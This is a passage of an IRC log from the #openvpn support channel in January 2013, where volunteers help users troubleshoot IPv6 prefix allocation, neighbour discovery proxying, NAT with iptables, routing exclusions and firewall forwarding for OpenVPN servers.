non-copyleft installer >:| 14:58 < ngharo> but i agree 14:58 <@ecrist> we're not "hiding" anything 14:58 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has quit [Quit: ByeBye] 14:59 < plaisthos> WhoNeedszzz: you configured a /64 pool and a /64 server address 14:59 < plaisthos> this is the default 14:59 < WhoNeedszzz> ngharo, i have to run to class, but i'll keep this on to see what is said 14:59 < WhoNeedszzz> thanks for the help 14:59 < WhoNeedszzz> i'll be back on later 14:59 < plaisthos> if you do not own the /64 this config is wrong too .... 15:00 -!- emmanuelux [~emmanuelu@vpn7.freedom-ip.com] has joined #openvpn 15:00 < WhoNeedszzz> i said the range i have 15:00 < WhoNeedszzz> i don't understand /64 /112 /blash 15:00 <+pekster> You used a /64 CIDR mask and described a /116 15:00 < WhoNeedszzz> /blah* 15:00 <+pekster> That's a huge difference 15:01 < plaisthos> WhoNeedszzz: then you should read a basic ipv6 whatever tutorial 15:01 < plaisthos> what /xx is 15:01 <+pekster> (of millions and millions of IPs) 15:01 < WhoNeedszzz> here's what my host says: Public IP Pools 2600:3c00::21:7000/64 - 2600:3c00::21:7fff/64 (4096 addresses) 15:01 < plaisthos> WhoNeedszzz: that is bullshit 15:01 < plaisthos> sorry but that makes no sense 15:01 < ngharo> most hosts don't know IPv6 themselves I found 15:02 < plaisthos> the range you posted 15:02 < WhoNeedszzz> so what is 2600:3c00::21:7000/64 2600:3c00::21:7000:0:0:0:0? 
15:02 < plaisthos> what would make is 2600:3c00:21:7000::/64 - 2600:3c00:21:7fff::/64 15:02 < plaisthos> WhoNeedszzz: nothing that makes any sense 15:03 < WhoNeedszzz> all i know is rc2 worked fine 15:03 < WhoNeedszzz> so it's clearly something wrong with 2.3.0 15:03 < WhoNeedszzz> nothing else has changed on my part 15:03 < WhoNeedszzz> but now i'm really late 15:04 <+pekster> A /52 is a little odd for a provider to hand out since they tend to stick with nibble boundaries (usually) 15:04 < plaisthos> yeah 15:04 <+pekster> I mean, technically you can do it... 15:04 <+pekster> They might actually be trying to "offer" a /116 or something really dumb, but then they need to be shot 15:05 <+pekster> And stop calling it a /64 :P 15:05 < ngharo> my host said "here's your /64, it has 65535 IPs" 15:06 < ngharo> lol k 15:06 < plaisthos> WhoNeedszzz: please before coming here time. a) learn about IPv6 and cidr b) get the correct range from provider you have and c) between 2.3rc2 and 2.3.0 there is nothing that affects you (I know the code changes, so don't tell me there is a difference) 15:07 < WhoNeedszzz> then explain why it worked in rc2 and not now 15:07 < plaisthos> WhoNeedszzz: see c) 15:07 < WhoNeedszzz> that doesn't explain 15:08 < WhoNeedszzz> that contradicts 15:08 < plaisthos> yes 15:08 < ngharo> can you ping6 to the vpn endpoint? 15:08 < WhoNeedszzz> which my experience is saying otherwise 15:08 < ngharo> what is your problem anyways, just won't route out to the internet? 15:08 < WhoNeedszzz> i can ping both client and server 15:08 < WhoNeedszzz> just nothing else 15:08 < WhoNeedszzz> both directions 15:08 < ngharo> your problem is likely outside of openvpn 15:08 < WhoNeedszzz> that wouldn't make sense 15:08 < ngharo> are you still running npd? 
15:08 < WhoNeedszzz> as i said, i didn't change anything on my system since 15:09 < ngharo> tcpdump your inet interface, look for icmpv6 packets 15:09 < plaisthos> WhoNeedszzz: the changes between 2.3rc2 and 2.3.0 are *extremely* unlikely to change *anyone's* setup 15:09 < ngharo> likely the router is asking WHO HAS xx:xx:xx:xx::x 15:09 < WhoNeedszzz> ah yeah npd6 wasn't running 15:10 < WhoNeedszzz> i didn't know i needed it 15:10 < ngharo> there ya go 15:10 < plaisthos> WhoNeedszzz: ndp6 does not work with /116 :D 15:10 < WhoNeedszzz> ok super late now thanks 15:11 -!- dazo_afk is now known as dazo 15:12 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-136.233.wb.wifirst.net] has quit [Ping timeout: 276 seconds] 15:13 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.224.wb.wifirst.net] has joined #openvpn 15:15 -!- Devastator [~devas@186.214.14.9] has quit [Changing host] 15:15 -!- Devastator [~devas@unaffiliated/devastator] has joined #openvpn 15:18 <+pekster> ngharo: This doc appears out of date re: NSIS, because it references a '\win\openvpn.nsi' script that I can't find anywhere in the 2.3.0 sources :\ 15:18 <+pekster> Nor the make_dist.py 15:18 <+pekster> ngharo: Oh, missed the link: https://community.openvpn.net/openvpn/wiki/BuildingOnWindows 15:18 <@vpnHelper> Title: BuildingOnWindows – OpenVPN Community (at community.openvpn.net) 15:21 < plaisthos> someone just asked me if it is possible to run an OpenVPN server on an Android telephone 15:21 * plaisthos really wonders what the use case is 15:21 <+pekster> Bridge it to an office wifi and accept connections from 3G for spy situations ;) 15:24 < plaisthos> pekster: :D 15:24 -!- nutron|w [~nutron@24.67.96.21] has joined #openvpn 15:24 <+pekster> "My name is Michael Westen, and I hacked OpenVPN to run as a service on my cell phone." 
15:38 -!- ade_b [~Ade@redhat/adeb] has quit [Remote host closed the connection] 15:44 -!- WhoNeedszzz [~WhoNeedsz@opennic/WNz] has quit [Ping timeout: 244 seconds] 15:50 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has quit [Quit: Leaving] 16:01 -!- raidz is now known as raidz_away 16:01 -!- Thermi [~Thermi@HSI-KBW-078-043-018-016.hsi4.kabel-badenwuerttemberg.de] has quit [Quit: ZNC - http://znc.in] 16:04 -!- Thermi [~Thermi@HSI-KBW-078-043-018-016.hsi4.kabel-badenwuerttemberg.de] has joined #openvpn 16:10 -!- raidz_away is now known as raidz 16:20 -!- fu_fu [~Adium@c-71-200-223-226.hsd1.fl.comcast.net] has joined #openvpn 16:28 -!- cjs226 [~cjs226@99-42-101-89.lightspeed.austtx.sbcglobal.net] has quit [] 16:36 -!- fu_fu [~Adium@c-71-200-223-226.hsd1.fl.comcast.net] has quit [Quit: Leaving.] 16:48 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has quit [] 17:06 -!- grimeton [~ruth@2a01:4f8:d12:c45:0:dead:beef:cafe] has left #openvpn [] 17:20 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 17:22 -!- Orbi [~opera@anon-184-62.vpn.ipredator.se] has quit [Quit: Orbi] 17:23 <@dazo> pekster: we've split out everything which is not strictly the cross platform stuff in OpenVPN into separate projects ... which includes easy-rsa, windows TAP driver and windows installer 17:23 -!- nutron|w [~nutron@24.67.96.21] has quit [Changing host] 17:23 -!- nutron|w [~nutron@unaffiliated/nutron] has joined #openvpn 17:23 <@dazo> (we even now got a better cross-platform build tool ... 
so you can more easily build windows binaries directly from Linux) 17:25 -!- cjs226 [~cjs226@99-61-64-43.lightspeed.austtx.sbcglobal.net] has joined #openvpn 17:28 -!- dazo is now known as dazo_afk 18:00 -!- wh1p [~angus@host-2-100-148-6.as13285.net] has joined #openvpn 18:18 -!- WhoNeedszzz [~WhoNeedsz@opennic/WNz] has joined #openvpn 18:19 < WhoNeedszzz> so yeah it turns out i do only have a /116 18:21 <+hazardous> what the hell 18:21 <+hazardous> who the fuck issues /116's 18:22 < WhoNeedszzz> Linode 18:22 < WhoNeedszzz> My question is who has the resources to issue /64s? 18:30 <+hazardous> anyone with a /48 which is standard 18:33 < WhoNeedszzz> ok so still not working with npd6 running 18:33 < WhoNeedszzz> ngharo, you here? 18:34 < WhoNeedszzz> ok apparently they will give a /64 upon request 18:34 < WhoNeedszzz> most people don't need a /64 18:34 < WhoNeedszzz> hell i wouldn't ever use 4096 addresses for a /116 18:40 < WhoNeedszzz> woo now i have 2600:3c00:e000:0016::/64 18:44 <+hazardous> 16:22:36 < WhoNeedszzz> My question is who has the resources to issue /64s? 18:44 <+hazardous> i can issue like, a few million /64's from my home allocation.. 
18:44 <+hazardous> idgi 18:44 <+hazardous> ipv6 isn't really something to conserve 18:44 < WhoNeedszzz> ah see that shows how little i know about ipv6 18:44 < WhoNeedszzz> i know there are a ton of possible addresses 18:45 <+hazardous> iirc every atom in the universe can have an address or something equally inane 18:45 < WhoNeedszzz> but it seems wasteful to allocate entire /64 blocks 18:51 -!- WhoNeedszzz [~WhoNeedsz@opennic/WNz] has quit [Read error: Connection reset by peer] 18:51 -!- WhoNeedszzz [~WhoNeedsz@opennic/WNz] has joined #openvpn 18:51 < WhoNeedszzz> Ok now i'm getting "MULTI: bad source address from client [192.168.1.9], packet dropped 18:56 -!- DaCheat_ [JMark@external.JmarkIT.com] has joined #openvpn 18:56 -!- WhoNeedszzz [~WhoNeedsz@opennic/WNz] has quit [Read error: Connection reset by peer] 18:59 -!- zeeshoem [~zee@198-84-231-11.cpe.teksavvy.com] has joined #openvpn 19:03 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Disconnected by services] 19:03 -!- medum_ [kevin@n2l.org] has joined #openvpn 19:04 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn 19:04 -!- Netsplit *.net <-> *.split quits: meepmeep, emmanuelux, medum, DaCheat, mnathani 19:04 -!- Netsplit over, joins: meepmeep 19:11 -!- DBordello [~DBordello@unaffiliated/dbordello] has quit [Ping timeout: 264 seconds] 19:11 -!- Netsplit *.net <-> *.split quits: meepmeep 19:11 -!- Netsplit over, joins: meepmeep 19:11 -!- WhoNeedszzz [~WhoNeedsz@opennic/WNz] has joined #openvpn 19:11 < WhoNeedszzz> Sorry vpn disconnected irc. Did anyone respond? 
19:11 < ngharo> !source 19:11 <@vpnHelper> My source is at http://supybot.com/ 19:11 < ngharo> !git 19:11 <@vpnHelper> "git" is (#1) For the stable git tree: git clone git://openvpn.git.sourceforge.net/gitroot/openvpn/openvpn.git or (#2) For the development git tree: git clone git://openvpn.git.sourceforge.net/gitroot/openvpn/openvpn-testing.git or (#3) Browse the git repositories here: http://openvpn.git.sourceforge.net/git/gitweb-index.cgi or (#4) See !git-doc how to use git 19:13 -!- DBordello [~DBordello@unaffiliated/dbordello] has joined #openvpn 19:13 -!- Cpt-Oblivious [~Cpt-Obliv@a202101.upc-a.chello.nl] has quit [] 19:14 < WhoNeedszzz> ngharo, can you help me? 19:14 < ngharo> i suppose :v 19:14 -!- swiftkey [swiftkey@unaffiliated/swiftkey] has joined #openvpn 19:15 < swiftkey> /join #openvpn-as 19:15 < swiftkey> /join #openvpn-as 19:15 < swiftkey> hmm 19:15 < swiftkey> hello there 19:16 < ngharo> WhoNeedszzz: whats your eth0 ipv6 addr? 19:17 < ngharo> or rather paste 'ip -6 a' and server config 19:17 < ngharo> brb poopin :> 19:19 < WhoNeedszzz> ngharo, https://gist.github.com/a75ccae32417abe46354 19:19 <@vpnHelper> Title: gist:a75ccae32417abe46354 (at gist.github.com) 19:19 -!- rabidsnail [~rabidsnai@unaffiliated/cmdrbatguano] has joined #openvpn 19:19 -!- savagecroc [~grahamsav@207.204.241.202] has joined #openvpn 19:20 < savagecroc> how do i exclude traffic to a particular IP from going over the VPN? 19:21 < rabidsnail> (in Linux) add a route specifically for that IP that goes over some other interface 19:21 < swiftkey> im new to vpn 19:21 -!- brute11k [~brute11k@89.249.235.236] has quit [Quit: Leaving.] 19:23 < swiftkey> http://pastie.org/5686111 does this mean that my vpn is ok ? 
19:23 -!- savagecroc [~grahamsav@207.204.241.202] has quit [Read error: Connection reset by peer] 19:23 -!- Olipro [~Olipro@uncyclopedia/pdpc.21for7.olipro] has quit [Ping timeout: 264 seconds] 19:23 < rabidsnail> savagecroc: man route, look at the examples 19:23 < swiftkey> but i cannot connect to the internet if i get connected to my vpn 19:24 < swiftkey> i already set /etc/resolv.conf to 8.8.8.8 19:27 < swiftkey> http://pastie.org/5686111 does this mean that my vpn is ok ? 19:27 < swiftkey> but i cannot connect to the internet if i get connected to my vpn 19:27 < swiftkey> i already set /etc/resolv.conf to 8.8.8.8 19:29 < ngharo> !linnat 19:29 <@vpnHelper> "linnat" is (#1) for a basic iptables NAT where 10.8.0.x is the vpn network: iptables -t nat -A POSTROUTING -s 10.8.0.0/24 -o eth0 -j MASQUERADE or (#2) to choose what IP address to NAT as, you can use iptables -t nat -I POSTROUTING -o eth0 -j SNAT --to or (#3) http://netfilter.org/documentation/HOWTO//NAT-HOWTO.html for more info or (#4) openvz see !openvzlinnat 19:29 < ngharo> !1918 19:29 <@vpnHelper> "1918" is (#1) RFC1918 makes three unique netblocks available for private use: 10.0.0.0/8, 172.16.0.0/12, and 192.168.0.0/16 or (#2) see also: http://en.wikipedia.org/wiki/Private_network or http://www.faqs.org/rfcs/rfc1918.html or (#3) Too lazy to find your own subnet? 
Try this one: http://scarydevilmonastery.net/subnet.cgi 19:29 < ngharo> swiftkey: read those 19:30 < ngharo> you should not be using 192.160 19:30 < ngharo> fix that, then configure a NAT 19:31 -!- savagecroc [~grahamsav@207.204.241.202] has joined #openvpn 19:31 -!- Olipro [~Olipro@d.e.r.p.6.a.1.0.d.d.0.7.2.0.1.0.a.2.ip6.arpa] has joined #openvpn 19:31 -!- Olipro [~Olipro@d.e.r.p.6.a.1.0.d.d.0.7.2.0.1.0.a.2.ip6.arpa] has quit [Changing host] 19:31 -!- Olipro [~Olipro@uncyclopedia/pdpc.21for7.olipro] has joined #openvpn 19:31 < savagecroc> ah found out the command 19:31 < savagecroc> route youku.com 255.255.255.0 net_gateway << very nice 19:31 < swiftkey> i'm not using 192.160 19:31 < swiftkey> it's 192.168. 19:32 < swiftkey> hmm let me check 19:32 < swiftkey> thanks ngharo 19:32 < WhoNeedszzz> ngharo, wb 19:32 < ngharo> swiftkey: that's not what your logs say 19:33 < swiftkey> yes my bad 19:33 < swiftkey> thanks for the eyespot 19:33 < swiftkey> erm i'm new to this thanks for your help :) 19:34 < ngharo> WhoNeedszzz: can you even ping out to ipv6.google.com from your server right now 19:34 < rabidsnail> I'm trying to set up openvpn to only proxy traffic for applications that explicitly want to. I'm trying to start openvpn with no routes (--route-noexec) and explicitly binding to the tun interface, but clients seem to block forever. 19:35 < ngharo> which IPv6 address is valid, you have two that I see 19:35 < rabidsnail> eg: curl --interface tun0 'http://www.ipchicken.com' 19:35 < swiftkey> how to fix NAT ? 19:35 < swiftkey> i guess this is a very lame question 19:35 < swiftkey> but i need to hehe 19:36 < ngharo> see above for an iptables example 19:36 < swiftkey> i turned off iptables 19:36 < ngharo> well you need something to NAT, like iptables 19:37 < WhoNeedszzz> ngharo, yeah i can 19:37 < WhoNeedszzz> ngharo, what should the npd6 prefix be now? 
19:37 < swiftkey> let me check again 19:38 < ngharo> WhoNeedszzz: well you said you've been assigned 2600:3c00:e000:0016::/64 19:38 < ngharo> yet i don't see any address configured with that 19:38 < ngharo> so i'm confused 19:38 < WhoNeedszzz> what do you mean? 19:39 < WhoNeedszzz> It's configured to tun0 19:39 < WhoNeedszzz> it's there what i pasted 19:39 < ngharo> eth0 isn't configured under that subnet 19:39 < swiftkey> i'm able to chat still but unable to surf 19:39 < swiftkey> i guess it's a NAT problem then 19:39 < WhoNeedszzz> it's routed to my other ipv6 address 19:40 < WhoNeedszzz> do i need to also add it to eth0? 19:40 < ngharo> i would 19:40 < ngharo> set npd prefix to 2600:3c00:e000:0016: 19:41 < ngharo> and server-ipv6 in config to server-ipv6 2600:3c00:e000:0016::f/112 19:41 < WhoNeedszzz> ah ok 19:45 -!- b1rkh0ff [~b1rkh0ff@178.77.8.47] has quit [Ping timeout: 255 seconds] 19:45 -!- WhoNeedszzz [~WhoNeedsz@opennic/WNz] has quit [Read error: Connection reset by peer] 19:46 -!- WhoNeedszzz [~WhoNeedsz@opennic/WNz] has joined #openvpn 19:46 < WhoNeedszzz> still no go 19:47 < WhoNeedszzz> does it have anything to do with the MULTI: Bad source address...blah...blah have to do with it? 
19:47 < WhoNeedszzz> wow sentence fail 19:48 < WhoNeedszzz> ngharo, 19:48 < ngharo> paste client log, ip -6 a, and ip -6 r 19:49 -!- raidz is now known as raidz_away 19:49 < ngharo> also do you still have ipv6 forwarding enabled 19:49 < ngharo> and proxy_npd 19:49 < ngharo> net.ipv6.conf.all.forwarding=1 19:49 < ngharo> net.ipv6.conf.all.proxy_ndp=1 19:50 < ngharo> (server) 19:53 < WhoNeedszzz> ngharo, https://gist.github.com/f413909536d3a3fdce76 19:53 -!- WhoNeedszzz [~WhoNeedsz@opennic/WNz] has quit [Remote host closed the connection] 19:53 <@vpnHelper> Title: gist:f413909536d3a3fdce76 (at gist.github.com) 19:54 -!- WhoNeedszzz [~WhoNeedsz@opennic/WNz] has joined #openvpn 19:54 < WhoNeedszzz> ngharo, https://gist.github.com/f413909536d3a3fdce76 19:54 <@vpnHelper> Title: gist:f413909536d3a3fdce76 (at gist.github.com) 19:54 < WhoNeedszzz> and yes those sysctl settings are correct 19:56 < ngharo> and npd has the right prefix and was restarted 19:56 < WhoNeedszzz> yes 19:56 -!- b1rkh0ff [~b1rkh0ff@178.77.8.47] has joined #openvpn 19:56 < ngharo> you can ping ip6 client<->server? 19:56 < WhoNeedszzz> yes 19:56 < WhoNeedszzz> both ways 19:57 < WhoNeedszzz> ah wait 19:57 < WhoNeedszzz> the prefix isn't right 19:57 < WhoNeedszzz> i have :16 instead of :0016 19:58 < ngharo> you can omit leading zeros 19:58 < ngharo> should be fine 19:58 < ngharo> tcpdump -i eth0 ip6 19:59 < ngharo> then do ping6 2001:1af8:4400:a049:: from client 19:59 < ngharo> do you see the traffic leaving eth0? 20:00 -!- savagecroc [~grahamsav@207.204.241.202] has quit [Ping timeout: 260 seconds] 20:02 -!- WhoNeedszzz [~WhoNeedsz@opennic/WNz] has quit [Read error: Connection reset by peer] 20:05 -!- WhoNeedszzz [~WhoNeedsz@opennic/WNz] has joined #openvpn 20:05 -!- CrashTM [~CrashTM@cpe-98-144-34-109.wi.res.rr.com] has joined #openvpn 20:05 < WhoNeedszzz> ngharo, the ping6 command you gave gives: "ping6: Source routing is deprecated by RFC5095." 
20:05 < CrashTM> how might i forward a port through my openvpn server to the client 20:06 < WhoNeedszzz> but i pinged the server vpn ipv6 address and didn't get any unknown solicitations 20:07 < WhoNeedszzz> it's hard to see what's going on in the dump because i have an ipv6 named server active 20:08 < ngharo> CrashTM: treat it like any other LAN interface 20:08 < CrashTM> >.> 20:08 < ngharo> also, where in WI :) 20:09 < ngharo> i'm just north of Milwaukee 20:09 < CrashTM> the mil 20:09 < ngharo> cool 20:09 < ngharo> I do a security meeting every month on 5th and national 20:09 < CrashTM> cool 20:10 < ngharo> dc414, check it out if you're interested 20:10 < CrashTM> mind giving more info on how i might do that 20:10 < WhoNeedszzz> ngharo, so what am i looking for in the tcpdump? 20:11 < ngharo> WhoNeedszzz: filter by 'icmp6' instead of just 'ip6' then 20:11 < ngharo> well 20:11 -!- gardar [~gardar@gardar.net] has quit [Quit: bye!] 20:11 < ngharo> i'm not sure why ping6 returns that 20:11 < WhoNeedszzz> can i filter out the port? 20:11 < ngharo> i still say assign 2600:3c00:e000:0016::/64 to eth0 20:11 < ngharo> and remove the others 20:11 < ngharo> and make sure you can ping6 google after that 20:12 < ngharo> then try vpn again 20:12 < WhoNeedszzz> well since the /64 is routed to the existing one, won't that screw things up? 20:12 < ngharo> i dunno, i'm too dumb to know that 20:12 < ngharo> CrashTM: http://serverfault.com/questions/140622/how-can-i-port-forward-with-iptables 20:12 <@vpnHelper> Title: linux - How can I port forward with iptables? - Server Fault (at serverfault.com) 20:13 < ngharo> CrashTM: you can assign static IPs to client with ccd entries 20:13 < ngharo> !ccd 20:13 <@vpnHelper> "ccd" is (#1) entries that are basically included into server.conf, but only for the specified client based on common-name. 
use --client-config-dir to enable it, then put the config options for the client in /common-name or (#2) the ccd file is parsed each time the client connects. 20:13 -!- gardar [~gardar@gardar.net] has joined #openvpn 20:14 < ngharo> WhoNeedszzz: maybe just assign that address in addition to what you have now 20:18 -!- WhoNeedszzz [~WhoNeedsz@opennic/WNz] has quit [Quit: Leaving] 20:19 -!- WhoNeedszzz [~WhoNeedsz@opennic/WNz] has joined #openvpn 20:19 -!- Castorrr [Castor_@CPE-72-133-200-232.wi.res.rr.com] has joined #openvpn 20:19 < WhoNeedszzz> ngharo, hmm nothing is coming up in tcpdump when i ping it 20:20 < WhoNeedszzz> other than IP6 fe80::ca4c:75ff:fef5:c4ff > whirlpool: ICMP6, neighbor solicitation, who has whirlpool, length 32 20:20 < WhoNeedszzz> and i'm constantly getting pinged by 2001:1af8:4400:a049::100f 20:20 < ngharo> yea thats me trying to hit your client 20:21 < WhoNeedszzz> ok 20:21 < WhoNeedszzz> thought so 20:21 < ngharo> so thats good you're receiving it 20:21 < ngharo> but the tun0<->eth0 is busted 20:21 < WhoNeedszzz> also getting IP6 whirlpool > fe80::1: ICMP6, neighbor solicitation, who has fe80::1, length 32 20:21 < ngharo> is it your god damned firewall again? :) 20:22 < WhoNeedszzz> haven't touched the fw 20:22 < ngharo> do you log drops? 20:22 < ngharo> check to make sure 20:22 < WhoNeedszzz> before i just had a typo of icmpv6-type 8 when it should have been 128 20:22 < WhoNeedszzz> how to check that? 20:23 < ngharo> it's your firewall man :) 20:23 < ngharo> syslog? 
20:23 < WhoNeedszzz> i'm getting request and reply from you 20:24 < ngharo> yeah to ::10 works 20:24 < ngharo> ::100f does not reply 20:24 < WhoNeedszzz> i use systemd so i guess journalctl 20:24 < WhoNeedszzz> well it's down now 20:24 < WhoNeedszzz> i can be on irc while it's on 20:24 < WhoNeedszzz> it makes my whole connection screw up 20:24 < WhoNeedszzz> can't* 20:25 < ngharo> you could comment the ipv4 redirect gateway 20:25 < ngharo> probably what's doing it 20:25 < ngharo> while testing 20:27 < WhoNeedszzz> ok yeah now it's not destroying my connection 20:27 < WhoNeedszzz> it's live now 20:27 < WhoNeedszzz> but can you still reach me when i'm not redirecting? 20:28 < CrashTM> ngharo 20:28 < CrashTM> hmm 20:28 < ngharo> that line has nothing to do with ipv6 20:28 < CrashTM> seems like it is not working 20:29 < WhoNeedszzz> so i should be able to ping6 ipv6.google.com when that is commented? 20:29 < ngharo> WhoNeedszzz: yes ideally 20:29 < WhoNeedszzz> i thought that was the whole point was that i need to redirect to get access 20:29 < WhoNeedszzz> i don't have ipv6 here 20:30 < ngharo> the 2000::/3 is your ipv6 "default" route 20:30 < ngharo> redirect-gateway is ipv4 20:32 < WhoNeedszzz> oh 20:32 < ngharo> WhoNeedszzz: can you ping6 2600:3c00::21:7d0c from your client? 20:32 < WhoNeedszzz> lol 20:32 < WhoNeedszzz> yeah 20:32 < WhoNeedszzz> is ipv6.google.com down? 20:33 < ngharo> lol no 20:33 < ngharo> WhoNeedszzz: but ping6 ngha.ro throws that source routing error? 20:34 < WhoNeedszzz> no now it just hangs 20:34 < ngharo> same with 2001:1af8:4400:a049:: 20:34 < ngharo> ? 
20:35 < WhoNeedszzz> yeah 20:35 < WhoNeedszzz> no error now 20:35 < WhoNeedszzz> just hangs 20:36 < ngharo> yeah i dunno 20:36 < ngharo> gather your details and ask in #ipv6 20:36 < ngharo> you can ping across the vpn 20:36 < ngharo> the problem is outside openvpn 20:37 < ngharo> CrashTM: google iptables port forwarding gives you hundreds of examples, take your pick 20:37 < WhoNeedszzz> when pinging you and running tcpdump i just get: "IP6 whirlpool > fe80::1: ICMP6, neighbor solicitation, who has fe80::1, length 32" 20:39 < ngharo> fe80::1 is your gateway? 20:39 < WhoNeedszzz> yes 20:40 < WhoNeedszzz> here is tcpdump running for a while: https://gist.github.com/9ebf0c6793d3c6fa3c8d 20:40 <@vpnHelper> Title: gist:9ebf0c6793d3c6fa3c8d (at gist.github.com) 20:45 < WhoNeedszzz> ngharo,? 20:48 -!- corretico [~luis@190.211.93.38] has quit [Ping timeout: 272 seconds] 20:48 < WhoNeedszzz> ngharo, are you sure it's not related to me seeing this?: MULTI: bad source address from client [192.168.1.9], packet dropped 20:50 < WhoNeedszzz> nvm i'm not actually getting that anymore 20:52 < WhoNeedszzz> according to linode it is my firewall 20:52 < WhoNeedszzz> they say the FORWARD chain needs to be ACCEPT or have rules to forward between eth0 and tun0 20:53 -!- corretico [~luis@190.211.93.38] has joined #openvpn 20:54 -!- corretico [~luis@190.211.93.38] has quit [Max SendQ exceeded] 20:55 < WhoNeedszzz> yep that's it alright 20:55 < WhoNeedszzz> hmm odd i don't remember allowing it to be accept before 20:55 -!- corretico [~luis@190.211.93.38] has joined #openvpn 20:56 < WhoNeedszzz> and ok so if that works without the redirect-gateway what is the benefit of that? 20:57 -!- corretico [~luis@190.211.93.38] has quit [Max SendQ exceeded] 20:57 < ngharo> ip4 traffic 20:57 -!- corretico [~luis@190.211.93.38] has joined #openvpn 20:57 < WhoNeedszzz> why would you want to route ip4 traffic? 20:58 < WhoNeedszzz> for encrypting traffic? 
20:58 < ngharo> to your server, yes 20:59 < WhoNeedszzz> You paranoid? :p 20:59 < WhoNeedszzz> What would be the benefit of that? 21:02 < ngharo> for me my traffic is encrypted until it goes overseas 21:02 < ngharo> which I like 21:02 -!- zz_AsadH is now known as AsadH 21:03 -!- AsadH [~AsadH@unaffiliated/asadh] has left #openvpn [] 21:04 -!- crazyhorse [~grahamsav@207.204.241.202] has joined #openvpn 21:04 < crazyhorse> any idea how i can push all traffic from a particular application over normal internet and not the VPN? 21:05 < ngharo> do you know the host the application contacts? 21:06 < crazyhorse> nah it's random hosts 21:06 < crazyhorse> utorrent 21:06 < crazyhorse> utorrent supports socks/http proxy 21:06 < crazyhorse> but i don't know if that helps 21:07 < WhoNeedszzz> ngharo, why does it not stay encrypted? 21:07 < crazyhorse> vpn has limited bandwidth 21:07 < crazyhorse> so i just want to run it over the normal internets 21:08 < ngharo> WhoNeedszzz: it gets decrypted once it reaches my server 21:08 < ngharo> WhoNeedszzz: as does your ipv6 traffic now 21:09 < WhoNeedszzz> any way i can make it stay encrypted? 21:09 < ngharo> no, the public internet doesn't know how to decrypt your stream 21:10 < ngharo> that would defeat the purpose 21:10 < WhoNeedszzz> right ok 21:11 < WhoNeedszzz> so currently if someone were snooping on my traffic they can't see my ipv6 traffic, correct? 21:11 < WhoNeedszzz> snooping on the client 21:11 < ngharo> they can't see anything between client and server 21:11 < ngharo> except a bunch of garbage 21:11 < WhoNeedszzz> So if i redirect my ipv4 traffic my ISP can't snoop on me, right? 
21:11 < ngharo> correct 21:12 < WhoNeedszzz> great 21:12 < WhoNeedszzz> i'll re-enable that then 21:12 < ngharo> your server's ISP still can though 21:12 < WhoNeedszzz> right 21:12 < WhoNeedszzz> they won't though 21:12 < ngharo> of course they wont :) 21:12 < WhoNeedszzz> i'm just trying to make my torrenting traffic encrypted :) 21:13 < ngharo> if ya got a server, why not torrent there? 21:13 < WhoNeedszzz> i tried just using encryption in the torrent client, but a lot of people can't be reached when i do that 21:13 < ngharo> rtorrent + rutorrent client = win 21:13 < WhoNeedszzz> then i would have to download to my server then upload to my client 21:13 < WhoNeedszzz> that would use my bandwidth 21:13 < WhoNeedszzz> i run a Tier 2 DNS server 21:14 < WhoNeedszzz> already get a lot of traffic 21:14 -!- crazyhorse [~grahamsav@207.204.241.202] has quit [Ping timeout: 255 seconds] 21:14 < ngharo> you're still using the same traffic doing it from client 21:14 < ngharo> but whatevs, either or 21:14 < WhoNeedszzz> oh ha you're right 21:14 < ngharo> i just prefer to do it on server for 100mbit action 21:14 < WhoNeedszzz> didn't think about it that way 21:20 -!- WhoNeedszzz [~WhoNeedsz@opennic/WNz] has quit [Disconnected by services] 21:21 -!- WhoNeedszzz [~WhoNeedsz@opennic/WNz] has joined #openvpn 21:21 < WhoNeedszzz> hmm restarting the vpn messes up my irc connection 21:21 < WhoNeedszzz> but at least it's working now 21:21 < WhoNeedszzz> Thanks for the help 21:58 -!- WhoNeedszzz [~WhoNeedsz@opennic/WNz] has left #openvpn ["Leaving"] 22:32 -!- rabidsnail [~rabidsnai@unaffiliated/cmdrbatguano] has quit [Quit: rabidsnail] 22:35 -!- blackness [black@2001:470:8cf8::9] has quit [Read error: Connection reset by peer] 22:45 -!- elc0 [~andy@c-71-205-251-207.hsd1.mi.comcast.net] has joined #openvpn 22:45 -!- HyperGlide [~HyperGlid@182.149.53.195] has quit [Remote host closed the connection] 22:46 < elc0> !welcome 22:46 <@vpnHelper> "welcome" is (#1) Start by stating your goal, 
such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum !wiki 22:46 <@vpnHelper> !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict) 22:46 < elc0> !ip forward 22:48 < elc0> !nat 22:48 <@vpnHelper> "nat" is (#1) http://openvpn.net/howto.html#redirect for an explanation of NAT as it applies to openvpn or (#2) http://www.secure-computing.net/wiki/index.php/OpenVPN/FAQ#Traffic_forwarding_doesn.27t_work_when_using_client_specific_access_rules or (#3) dont forget to turn on ip forwarding or (#4) please choose between !linnat !winnat and !fbsdnat for specific howto 22:53 -!- zeeshoem [~zee@198-84-231-11.cpe.teksavvy.com] has quit [] 22:54 -!- mnathani [~zee@198-84-231-11.cpe.teksavvy.com] has joined #openvpn 22:58 -!- elc0 [~andy@c-71-205-251-207.hsd1.mi.comcast.net] has quit [Ping timeout: 245 seconds] 23:14 -!- bigmeow [~mirror@184.82.217.174] has quit [Ping timeout: 276 seconds] 23:15 -!- bigmeow [~mirror@184.82.217.174] has joined #openvpn 23:52 < mnathani> How can I use the windows openvpn client with my opensource / (Non-Access Server version of Openvpn) Not sure how to create an openvpn profile --- Day changed Tue Jan 15 2013 00:08 -!- CrashTM [~CrashTM@cpe-98-144-34-109.wi.res.rr.com] has quit [Quit: Leaving] 00:15 < ngharo> !sample 00:15 <@vpnHelper> "sample" is (#1) http://www.ircpimps.org/openvpn.configs for a working sample config or (#2) DO NOT use these configs until you understand the commands in them, read up on each first column of the configs in the manpage (see 